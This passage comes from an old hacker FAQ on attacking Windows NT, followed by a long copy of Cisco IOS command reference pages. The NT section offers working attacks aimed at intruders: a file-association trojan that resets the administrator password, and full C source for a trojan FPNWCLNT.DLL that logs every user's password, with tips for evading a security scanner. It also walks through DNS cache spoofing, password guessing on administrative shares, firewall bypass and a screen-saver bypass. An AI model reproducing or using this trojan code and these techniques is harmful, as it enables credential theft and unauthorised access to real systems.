Most users do not login directly to the Primary Domain Controller (PDC), they login to a Backup Domain Controller (BDC). BDCs do NOT contain readonly versions of SAM, they contain read-write versions. To keep the already ungodly amount of network traffic down, BDCs do not tell the PDC that they have an update of the last login time until a password change has been done. And
the NET USER <userid> /DOMAIN command checks the PDC, so last login time returned from this command could be wildly off (it could even show NEVER).
As a hacker, if you happen to know that password aging is not enforced, then you can bet that last login times will probably not be very accurate.
[11.1.1] Ive got Guest access, can I try for Admin?
Basic NT 3.51 has some stuff read/writeable by default. You could edit the association between an application and the data file extension using regedt32. First off, you should write a Win32 app that does nothing but the following -
net user administrator biteme /y
notepad %1 %2 %3 %4 %5
In a share you have read/write access to, upload it. Now change the association between .txt files and notepad to point to the location of the uploaded file, like
\\ThisWorkstation\RWShare\badboy.exe.
Now wait for the administrator to launch a text file by double clicking on it, and the password becomes "biteme".
Of course, if the Sys Admin is smart they will have removed write permission from Everyone for HKEY_CLASSES_ROOT, only giving out full access to creator\owner.
[11.1.2] I heard that the %systemroot%\system32 was writeable?
Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison (jra@cygnus.com) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp.
------------- cut --------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};
static HANDLE fh;
BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}
LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,
struct UNI_STRING *passwd)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;
memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);
return 0L;
}
------------- cut --------------
If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systenroot%\system32.
ISS (
www.iss.net
) has a security scanner for NT which will detect the trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the trojan.
It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot\system32, so any DLL that is not in use by the system could be replaced with a trojan DLL that does something else.
[11.1.3] What about spoofin DNS against NT?
By forging UDP packets, NT name server caches can be compromised. If recursion is allowed on the name server, you can do some nasty things. Recursion is when a server receives a name server lookup request for a zone or domain for which is does not serve. This is typical how
most setups for DNS are done.
So how do we do it? We will use the following example:
We are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of 10.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at lame.com access pirate.nmrc.org when they try to access
www.lamer.net
.
Okay, assume automation is at work here to make the attack smoother...
- DNS query is sent to ns.lame.com asking for address of bait.nmrc.org.
- ns.lame.com asks ns.nmrc.org what the address is.
- The request is sniffed, and the query ID number is obtained from the
request packet.
- DNS query is sent to ns.lame.com asking for the address of
www.lamer.net
.
- Since we know the previous query ID number, chances are the next query
ID number will be close to that number.
- We send spoofed DNS replies with several different query ID numbers.
These replies are spoofed to appear to come from ns.lamer.net, and state
that its address is 10.10.10.2.
- pirate.nmrc.org is set up to look like
www.lamer.net
, except maybe it
has a notice to "go to the new password page and set up an account and ID".
Odds are this new password is used by that lame.com user somewhere else...
With a little creativity, you can also do other exciting things like reroute (and make copies of) email, denial of service (tell lame.com that
www.lamer.net
doesn't exist anymore), and other fun things.
Supposedly Service Pack 3 fixes this.
[11.1.4] What about default shared folders?
The main thing to realize about shares is that there are a few that are invisible. Administrative shares are default accounts that cannot be removed. They have a $ at the end of their name. For example C$ is the administrative share for the C: partition, D$ is the administrative share
for the D: partition. WINNT$ is the root directory of the system files.
By default since logging is not enabled on failed attempts and the administrator doesn't get locked out from false attempts, you can try and try different passwords for the administrator account. You could also try a dictionary attack Once in, you can get at basically anything.
[11.1.5] How do I get around a packet filter-based firewall?
If the target NT box is behind a firewall that is doing packet filtering (which is not considered firewalling by many folks) and it does not have SP3 loaded it is possible to send it packets anyway. This involves sending decoy IP packet fragments with specially crafted headers that will be "reused" by the malicious IP packet fragments. This is due to a problem with the way NT's TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code exists to prove it works. See the web page at
http://www.dataprotect.com/ntfrag
for details.
How does it bypass the packet filter? Typically packet filtering only drops the fragmented packet with the offset of zero in the header. The example source forges the headers to get around this, and NT happily reassembles what does arrive.
[11.1.6] What is NTFS?
NTFS is the Windows NT special file system. This file system is tightly integrated into Windows security -- it is what allows access levels to be set from the directory down to individual files within a directory.
[11.1.7] Are there are vulnerabilities to NTFS and access controls?
Not so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degree.
For example, let's say the system admin has built a home directory for you on the server, but has disallowed the construction of directories or files that you wish to make available to the group Everyone. You are wanting to make this special directory so that you can easily retrieve some hack tools but you are cut off. However, if the sys admin left you as the owner of the home directory, you can go in and alter its permissions. This is because as long as you are the owner or Administrator you still control the file. Oh sure, you may get a few complaints from the system when you are doing it, but it can be done.
Since NTFS has security integrated into it, there are not too many ways around it. The main one requires access to the physical system. Boot up the system on a DOS diskette, and use NTFSDOS.EXE. It will allow you to access an NTFS volume bypassing security.
The last quirk is that if you have a directory with Full Control instead of RWXDPO permissions, then you get a hidden permission called File Delete Child. FDC cannot be removed. This means that all members of the group Everyone can delete any read-only file in the directory. Depending on what the directory contains, a hacker can replace a file with a trojan.
[11.1.8] How is file and directory security enforced?
Since files and directories are considered objects (same as services), the security is managed at an "object" level.
An access-control list (ACL) contains information that controls access to an object or controls auditing of attempts to access an object. It begins with a header contains information pertaining to the entire ACL, including the revision level, the size of the ACL, and the number of access-control
entries (ACEs) in the list.
After the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee can be a user account, group account, or a logon account for a service program.
A security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system ACL (SACL).
In a DACL, each ACE specifies the types of access that are allowed or denied for a specified trustee. An object's owner controls the information in the object's DACL. For example, the owner of a file can use a DACL to control which users can have access to the file, and which users are
denied access.
If the security descriptor for an object does not have a DACL, the object is not protected and the system allows all attempts to access the object. However, if an object has a DACL that contains no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts to access the object.
In a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the system to generate audit records in the system event log. A system administrator controls the information in the object's SACL. An ACE in a SACL can generate audit records when an access attempt fails, when it succeeds, or both.
To keep track of the individual object, a Security Identifier (SID) uniquely identify a user or a group.
A SID contains:
- User and group security descriptors
- 48-bit ID authority
- Revision level
- Variable subauthority values
A privilege is used to control access to a service or object more strictly than is normal with discretionary access control. Privileges provide access to services rarely needed by most users. For example, one type of privilege might give access for backups and restorals, another might allow the system time to be changed.
[11.1.9] Once in, how can I do all that GUI stuff?
The main problem is adjusting NT file security attributes. Some utilities are available with NT that can be used, but I'd recommend using the NT Command Line Security Utilities. They include:
saveacl.exe - saves file, directory and ownership permissions to a file
restacl.exe - restores file permissions and ownership from a saveacl file
listacl.exe - lists file permissions in human readable format
swapacl.exe - swaps permissions from one user or group to another
grant.exe - grants permissions to users/groups on files
revoke.exe - revokes permissions to users/groups on files
igrant.exe - grants permisssions to users/groups on directories
irevoke.exe - revokes permissions to users/groups on directories
setowner.exe - sets the ownership of files and directories
nu.exe - 'net use' replacement, shows the drives you're connected to
The latest version can be found at:
ftp://ftp.netcom.com/pub/wo/woodardk/
">
ftp://ftp.netcom.com/pub/wo/woodardk/
[11.2.0] How do I bypass the screen saver?
If a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an administrator, you will have a window of a few seconds where you will see the user's desktop, and even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack has been loaded.
If the service pack has been loaded, but it's still 3.X, try the following.
- From another NT workstation, type the following command:
shutdown \\<target_computer> /t:30
- This will start a 30 second shutdown on the target and a Security
window will pop up.
- Cancel the shutdown with the following command:
shutdown \\<target_computer> /a
- The screen saver will kick back in.
- Wiggle the mouse on the target. The screen will go blank.
- Now do a ctrl-alt-del on the target.
- An NT Security window will appear. Select cancel.
- You are now at the Program Manager.
[11.2.1] How can tell if its an NT box?
Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't expect that...
Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not Windows 95, however. Using Samba you should be able to connect and query for the existence of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check \CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first as Everyone has read permissions here by default.
Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used, certainly you can expect port 137 to be open if IP is anywhere in use around NT.
Another possible indication is checking for port 139. This tells you your target is advertising an SMB resource to share info, but it could be any number of things, such as a Windows 95 machine or even Windows for Workgroups. These may not be entirely out of the question as potential
targets, but if you are after NT you will have to use a combination of the aforementioned techniques coupled with some common sense.
To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on remote systems.
[11.2.2] What exactly does the NetBios Auditing Tool do?
Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the complete source code. It is the "SATAN" of NetBios based systems.
Here is a quote from Secure Networks Inc about the product -
"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services offered by the target system. It implements a stepwise approach to gather information and attempt to obtain file system-level access as though it were a legitimate local client.
The major steps are as follows:
A UDP status query is sent to the target, which usually elicits a reply containing the Netbios "computer name". This is needed to establish a session. The reply also can contain other information such as the workgroup and account names of the machine's users. This part of the program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent back to UDP port 137 even if the original query came from some different port.
TCP connections are made to the target's Netbios port [139], and session requests using the derived computer name are sent across. Various guesses at the computer name are also used, in case the status query failed or returned incomplete information. If all such attempts to establish a session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was reachable.
Provided a connection is established Netbios "protocol levels" are now negotiated across the new connection. This establishes various modes and capabilities the client and server can use with each other, such as password encryption and if the server uses user-level or share-level Security. The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that protocol is somewhat simpler and uses a smaller password keyspace than NT.
If the server requires further session setup to establish credentials, various defaults are attempted. Completely blank usernames and passwords are often allowed to set up "guest" connections to a server; if this fails then guesses are tried using fairly standard account names such as ADMINISTRATOR, and some of the names returned from the status query. Extensive username/password checking is NOT done at this point, since the aim is just to get the session established, but it should be noted that if this phase is reached at all MANY more guesses can be attempted and likely without the owner of the target being immediately aware of it.
Once the session is fully set up, transactions are performed to collect more information about the server including any file system "shares" it offers.
Attempts are then made to connect to all listed file system shares and some potentially unlisted ones. If the server requires passwords for the shares, defaults are attempted as described above for session setup. Any successful connections are then explored for writeability and some well-known file-naming problems [the ".." class of bugs].
If a NETBIOS session can be established at all via TCP port 139, the target is declared "vulnerable" with the remaining question being to what extent. Information is collected under the appropriate vulnerability at most of these steps, since any point along the way be blocked by the Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will yield computer names and share lists, but not allow actual file-sharing connections without
a valid username and/or password. A remote connection to a share is therefore a possibly serious Security problem, and a connection that allows WRITING to the share almost certainly so.
Printer and other "device" services offered by the server are currently ignored."
If you need more info on NAT, try looking at this web location:
http://www.secnet.com/ntinfo/ntaudit.html
http://www.rhino9.org
[12.0.0] Cisco Routers and their configuration
Many many hackers and security professionals alike take routers for granted. Well, I have a news flash for you, if your routers go down, so does your network. We have included this section to attempt to educate system administrators on configuring cisco routers. Keep in mind that cisco is to date, the most widely used and common router. And for good reason, it’s a damn good router. Kudos to Cisco for making an excellent product. (NOTE: The rhino9 team did not sell, or make a profit off of this publication in any way, shape or form.) The information below was retrieved from the Cisco website (
www.cisco.com)
.
Copyright 1988-1997
©
Cisco Systems Inc.
Many times, routers will not have passwords configured (this is mainly due to ignorant administrators… HEY.. Hire someone that knows what theyre doing… like a security professional or a Cisco Engineer…. Geeesh.)
[12.0.1] User Interface Commands
This chapter describes the commands used to enter and exit the various Cisco Internetwork Operating System (Cisco IOS) configuration command modes. It provides a description of the
help
command and help features, lists the command editing keys and functions, and details the command history feature.
You can abbreviate the syntax of Cisco IOS configuration commands. The software recognizes a command when you enter enough characters of the command to uniquely identify it.
For user interface task information and examples, see the "Understanding the User Interface" chapter of the
Configuration Fundamentals Configuration Guide
.
[12.0.2] disable
To exit privileged EXEC mode and return to user EXEC mode, enter the
disable
EXEC command.
disable
[
level
]
Syntax Description
level
(Optional) Specifies the user-privilege level.
Note
The
disable
command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
Use this command with the
level
option to reduce the user-privilege level. If a level is not specified, it defaults to the user EXEC mode, which is level 1.
Example
In the following example, entering the
disable
command causes the system to exit privileged EXEC mode and return to user EXEC mode as indicated by the angle bracket (>):
Router#
disable
Router>
Related Command
enable
[12.0.3] editing
To enable enhanced editing mode for a particular line, use the
editing
line configuration command. To disable the enhanced editing mode, use the
no
form of this command.
editing
no editing
Syntax Description
This command has no arguments or keywords.
Default
Enabled
Command Mode
Line configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
Keys Function
Tab Completes a partial command name entry. When you enter a unique set of characters and press the Tab key, the system completes the command name. If you enter a set of characters that could indicate more than one command, the system beeps to indicate an error. Enter a question mark (?) immediately following the partial command (no space). The system provides a list of commands that begin with that string.
Delete or Backspace Erases the character to the left of the cursor.
Return At the command line, pressing the Return key performs the function of processing a command. At the "---More---" prompt on a terminal screen, pressing the Return key scrolls down a line.
Space Bar Allows you to see more output on the terminal screen. Press the space bar when you see the line "---More---" on the screen to display the next screen.
Left Arrow Moves the cursor one character to the left. When you enter a command that extends beyond a single line, you can press the Left Arrow key repeatedly to scroll back toward the system prompt and verify the beginning of the command entry.
Right Arrow1 Moves the cursor one character to the right.
Up Arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
Down Arrow1 or
Ctrl-N Return to more recent commands in the history buffer after recalling commands with the Up Arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
Ctrl-A Moves the cursor to the beginning of the line.
Ctrl-B Moves the cursor back one character.
Ctrl-D Deletes the character at the cursor.
Ctrl-E Moves the cursor to the end of the command line.
Ctrl-F Moves the cursor forward one character.
Ctrl-K Deletes all characters from the cursor to the end of the command line.
Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the command line.
Ctrl-V and Esc Q Inserts a code to indicate to the system that the keystroke immediately following should be treated as a command entry,
not
as an editing key.
Ctrl-W Deletes the word to the left of the cursor.
Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
Esc B Moves the cursor back one word.
Esc C Capitalizes the word from the cursor to the end of the word.
Esc D Deletes from the cursor to the end of the word.
Esc F Moves the cursor forward one word.
Esc L Changes the word to lowercase at the cursor to the end of the word.
Esc U Capitalizes from the cursor to the end of the word.
Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted. Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
The arrow keys function only with ANSI-compatible terminals.
Key Function
Delete or Backspace Erases the character to the left of the cursor.
Ctrl-W Erases a word.
Ctrl-U Erases a line.
Ctrl-R Redisplays a line.
Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
Return Executes single-line commands.
Example
In the following example, enhanced editing mode is disabled on line 3:
line 3
no editing
Related Command
A dagger (†) indicates that the command is documented outside this chapter.
terminal editing
†
[12.0.4] enable
To enter privileged EXEC mode, use the
enable
EXEC command.
enable
[
level
]
Syntax Description
level
(Optional) Privileged level on which to log in.
Note
The
enable
command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
Command Mode
EXEC
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
Because many of the privileged commands set operating parameters, privileged access should be password-protected to prevent unauthorized use. If the system administrator has set a password with the
enable password
global configuration command, you are prompted to enter it before being allowed access to privileged EXEC mode. The password is case sensitive.
If an enable password has not been set, enable mode only can be accessed from the router console. If a level is not specified, it defaults to the privileged EXEC mode, which is level 15.
Example
In the following example, the user enters the
enable
command and is prompted to enter a password. The password is not displayed on the screen. After the user enters the correct password, the system enters privileged command mode as indicated by the pound sign (#).
Router>
enable
Password:
Router#
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
disable
enable password
†
[12.0.5] end
To exit configuration mode, or any of the configuration submodes, use the
end
global configuration command.
end
Syntax Description
This command has no arguments or keywords.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
You can also press
Ctrl-Z
to exit configuration mode.
Example
In the following example, the name is changed to
george
using the
hostname
global configuration command. Entering the
end
command causes the system to exit configuration mode and return to EXEC mode.
Router(config)#
hostname george
george(config)#
end
george#
Related Command
A dagger (†) indicates that the command is documented outside this chapter.
hostname
†
[12.0.6] exit
To exit any configuration mode or close an active terminal session and terminate the EXEC, use the
exit
command at the system prompt.
exit
Syntax Description
This command has no arguments or keywords.
Command Mode
Available in all command modes.
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
Use the
exit
command at the EXEC levels to exit the EXEC mode. Use the
exit
command at the configuration level to return to privileged EXEC mode. Use the
exit
command in interface, line, router, IPX-router, and route-map command modes to return to global configuration mode. Use the
exit
command in subinterface configuration mode to return to interface configuration mode. You also can press
Ctrl-Z
, or use the
end
command, from any configuration mode to return to privileged EXEC mode.
Note
The
exit
command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
Examples
In the following example, the user exits subinterface configuration mode to return to interface configuration mode:
Router(config-subif)#
exit
Router(config-if)#
The following example shows how to exit an active session.
Router>
exit
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
disconnect
†
end
logout
†
[12.0.7] full-help
To get help for the full set of user-level commands, use the
full-help
command.
full-help
Syntax Description
This command has no arguments or keywords.
Default
Disabled
Command Mode
Available in all command modes.
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
full-help
command enables (or disables) an unprivileged user to see all of the help messages available. It is used with the
show?
command.
Example
The following example is output for
show?
with
full-help
disabled:
Router>
show ?
clock Display the system clock
history Display the session command history
hosts IP domain-name, lookup style, nameservers, and host table
sessions Information about Telnet connections
terminal Display terminal configuration parameters
users Display information about terminal lines
version System hardware and software status
Related Command
help
[12.0.8] help
To display a brief description of the help system, enter the
help
command.
help
Syntax Description
This command has no arguments or keywords.
Command Mode
Available in all command modes.
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
help
command provides a brief description of the context-sensitive help system.
To list all commands available for a particular command mode, enter a question mark (?) at the
system prompt.
To obtain a list of commands that begin with a particular character string, enter the abbreviated command entry immediately followed by a question mark (?). This form of help is called word help, because it lists only the keywords or arguments that begin with the abbreviation you entered.
To list a command's associated keywords or arguments, enter
a question mar
k (?) in pla
ce of a keyword or argument on the command line.
This form of help is called command syntax help, because it lists the keywords or arguments that apply based on the command, keywords, and arguments you have already entered.
Note
The
help
command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the command set for that privilege level.
Examples
Enter the
help
command for a brief description of the help system:
Router#
help
Help may be requested at any point in a command by entering
a question mark '?'. If nothing matches, the help list will
be empty and you must backup until entering a '?' shows the
available options.
Two styles of help are provided:
1. Full help is available when you are ready to enter a
command argument (e.g. 'show ?') and describes each possible
argument.
2. Partial help is provided when an abbreviated argument is entered
and you want to know what arguments match the input
(e.g. 'show pr?'.)
The following example shows how to use word help to display all the privileged EXEC commands that begin with the letters "co":
Router#
co?
configure connect copy
The following example shows how to use command syntax help to display the next argument of a partially complete
access-list
command. One option is to add a wildcard mask. The <cr> symbol indicates that the other option is to press Return to execute the command.
Router(config)#
access-list 99 deny 131.108.134.234 ?
A.B.C.D Mask of bits to ignore
<cr>
Related Command
full-help
[12.0.9] history
To enable the command history function, or to change the command history buffer size for a particular line, use the
history
line configuration command. To disable the command history feature, use the
no
form of this command.
history
[
size
number-of-lines
]
no history
[
size
number-of-lines
]
Syntax Description
size
number-of-lines
(Optional) Specifies the number of command lines that the system will record in its history buffer. The range is 0 to 256.
Default
10 lines
Command Mode
Line configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
history
command without the
size
keyword and the
number-of-lines
argument enables the history function with the last buffer size specified or with the default of 10 lines, if there was not a prior setting.
The
no history
command without the
size
keyword and the
number-of lines
argument disables the history feature but remembers the buffer size if it was something other than the default. The
no history size
command resets the buffer size to 10.
Note
The
history size
command only sets the size of the buffer; it does not reenable the history feature. If the
no history
command is used, the
history
command must be used to reenable this feature.
The command history feature provides a record of EXEC commands that you have entered. This feature is particularly useful for recalling long or complex commands or entries, including access lists.
Key Functions
Ctrl-P or Up Arrow
Recalls commands in the history buffer in a backward sequence, beginning with the most recent command. Repeat the key sequence to recall successively older commands.
Ctrl-N or Down Arrow1 Returns to more recent commands in the history buffer after recalling commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more recent commands.
1 The arrow keys function only with ANSI-compatible terminals such as VT100s.
Example
In the following example, line 4 is configured with a history buffer size of 35 lines:
line 4
history size 35
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
show history
terminal history size
†
[12.1.0] ip http access-class
To assign an access-list to the http server used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the
ip http access-class
global configuration command. To remove the assigned access list, use the
no
form of this command.
ip http access-class
{
access-list-number
|
name
}
no ip http access-class
{
access-list-number
|
name
}
Syntax Description
access-list-number
Standard IP access list number in the range 0 to 99, as configured by the
access-list (standard)
command.
name
Name of a standard IP access list, as configured by the
ip access-list
command.
Default
There is no access list applied to the http server.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 11.2.
If this command is configured, the specified access list is assigned to the http server. Before the http server accepts a connection, it checks the access list. If the check fails, the http server does not accept the request for a connection.
Example
The following command assigns the access list named
marketing
to the http server:
ip http access-class marketing
ip access-list standard marketing
permit 192.5.34.0 0.0.0.255
permit 128.88.0.0 0.0.255.255
permit 36.0.0.0 0.255.255.255
! (Note: all other access implicitly denied)
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
ip access-list
†
ip http server
[12.1.1] ip http port
To specify the port to be used by the Cisco IOS ClickStart software or the Cisco Web browser interface, use the
ip http port
global configuration command. To use the default port, use the
no
form of this command.
ip http port
number
no ip http port
Syntax Description
number
Port number for use by ClickStart or the Cisco Web browser interface. The default is 80.
Default
80
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 11.2.
Use this command if ClickStart or the Cisco Web browser interface cannot use port 80.
Example
The following command configures the router so that you can use ClickStart or the Cisco Web browser interface via port 60:
ip http server
ip http port 60
Related Command
ip http server
[12.1.2] ip http server
To enable a Cisco 1003, Cisco 1004, or Cisco 1005 router to be configured from a browser using the Cisco IOS ClickStart software, and to enable any router to be monitored or have its configuration modified from a browser using the Cisco Web browser interface, use the
ip http server
global configuration command. To disable this feature, use the
no
form of this command.
ip http server
no ip http server
Syntax Description
This command has no arguments or keywords.
Default
This feature is enabled on Cisco 1003, Cisco 1004, and Cisco 1005 routers that have not yet been configured. For Cisco 1003, Cisco 1004, and Cisco 1005 routers that have already been configured, and for all other routers, this feature is disabled.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 11.2.
Example
The following command configures the router so that you can use the Cisco Web browser interface to issue commands to it:
ip http server
Related Commands
ip http access-class
ip http port
[12.1.3] menu (EXEC)
Use the
menu
EXEC command to invoke a user menu.
menu
name
Syntax Description
name
The configuration name of the menu.
Command Mode
User EXEC mode or privileged EXEC mode
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
A menu can be invoked at either the user or privileged EXEC level, but if an item in the menu contains a privileged EXEC command, the user must be logged in at the privileged level for the command to succeed.
Example
The following example shows how to invoke the menu named
Access1
:
menu Access1
[12.1.4] menu (global)
Use the
menu
global configuration command with the appropriate keyword to specify menu-display options. Use the
no
form of the global configuration command to delete a specified, or named, menu from the configuration.
menu
name
[
clear-screen
|
line-mode
|
single-space
|
status-line
]
no
menu
name
Syntax Description
name
The configuration name of the menu.
clear-screen
(Optional) Clears the terminal screen before displaying a menu.
line-mode
(Optional) In a menu of nine or fewer items, you ordinarily select a menu item by entering the item number. In line mode, you select a menu entry by entering the item number and pressing Return. Line mode allows you to backspace over the selected number and enter another number before pressing Return to execute the command. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer items.
single-space
(Optional) Displays menu items single-spaced rather than double-spaced. This option is activated automatically when more than nine menu items are defined but also can be configured explicitly for menus of nine or fewer items.
status-line
(Optional) Displays a line of status information about the current user.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
clear-screen
option uses a terminal-independent mechanism based on termcap entries defined in the router and the terminal type configured for the user's terminal. The
clear-screen
option allows the same menu to be used on multiple types of terminals instead of having terminal-specific strings embedded within menu titles. If the termcap entry does not contain a clear string, the menu system enters 24 newlines, causing all existing text to scroll off the top of the terminal screen.
The
status-line
option displays the status information at the top of the screen before the menu title is displayed. This status line includes the router's host name, the user's line number, and the current terminal type and keymap type (if any).
A menu can be activated at the user EXEC level or at the privileged EXEC level, depending upon whether the given menu contains menu entries using privileged commands.
When a particular line should always display a menu, that line can be configured with an
autocommand
configuration command. The menu should not contain any exit paths that leave users in an unfamiliar interface environment.
Menus can be run on a per-user basis by defining a similar autocommand for that local username.
Examples
The following example shows how to invoke the menu named
Access1
:
menu Access1
The following example shows how to display the status information using the
status-line
option for the menu named
Access1
:
menu Access1 status-line
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
menu command
†
menu text
menu title
resume
†
[12.1.5] menu command
Use the
menu
command
global configuration command to specify underlying commands for user interface menus.
menu
name
command
number
Syntax Description
name
The configuration name of the menu. You can specify a maximum of 20 characters.
number
The selection number associated with the menu entry. This number is displayed to the left of the menu entry. You can specify a maximum of 18 menu entries. When the tenth item is added to the menu, the line-mode and single-space options are activated automatically.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
menu
command
and
menu text
commands define a menu entry. These commands must use the same menu name and menu selection number.
The
menu
command
has a special option,
menu-exit
, that is available only within menus. It is used to exit a submenu and return to the previous menu level or exit the menu altogether and return to the EXEC command prompt.
You can create submenus that are opened by selecting a higher-level menu entry. Use the
menu command
to invoke a menu as the command in a line specifying a higher-level menu entry.
Note
If you nest too many levels of menus, the system prints an error message on the terminal and returns to the previous menu level.
When a menu allows connections (their normal use), the command for an entry activating the connection should contain a
resume
command, or the line should be configured to prevent users from escaping their sessions with the
escape-char none
command. Otherwise, when they escape from a connection and return to the menu, there will be no way to resume the session and it will sit idle until the user logs off.
Specifying the
resume
command as the action that is performed for a selected menu entry permits a user to resume a named connection or connect using the specified name, if there is no active connection by that name. As an option, you can also supply the connect string needed to connect initially. When you do not supply this connect string, the command uses the specified connection name.
You can also use the
resume/next
command, which resumes the next connection in the user's list of connections. This function allows you to create a single menu entry that steps through all of the user's connections.
Refer to the
Access Services Configuration Guide
for more information on the menu command.
Example
The following example shows how to specify the commands to be executed when a user enters the selection number associated with the menu entry for the menu named
Access1
:
menu Access1 command 1 tn3270 vms.cisco.com
menu Access1 command 2 rlogin unix.cisco.com
menu Access1 command 3 menu-exit
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
menu (global)
†
menu text
menu title
resume
†
[12.1.6] menu text
Use the
menu
text
global configuration command to specify the text of a menu item in a user interface menu.
menu
name
text
number
Syntax Description
name
The configuration name of the menu. You can specify a maximum of 20 characters.
number
The selection number associated with the menu item. This number is displayed to the left of the menu item. You can specify a maximum of 18 menu items. When the tenth item is added to the menu, the
line-mode
and
single-space
options are activated automatically.
Command Mode
Global configuration
Usage Guidelines
This command first appeared in Cisco IOS Release 10.0.
The
menu
text
command and the
menu command
define a menu item. These commands must use the same menu name and menu selection number.
You can specify a maximum of 18 items in a menu.
Example
The following example shows how to specify the descriptive text for the three entries in the menu
Access1
:
menu Access1 text 1 IBM Information Systems
menu Access1 text 2 UNIX Internet Access
menu Access1 text 3 Exit menu system
Related Commands
A dagger (†) indicates that the command is documented outside this chapter.
menu (global)
menu command
menu title
resume
†
[12.1.7] menu title
Use the
menu
title
global configuration command to create a title, or banner, for a user menu.
menu
name
title
delimiter
Syntax Description
name
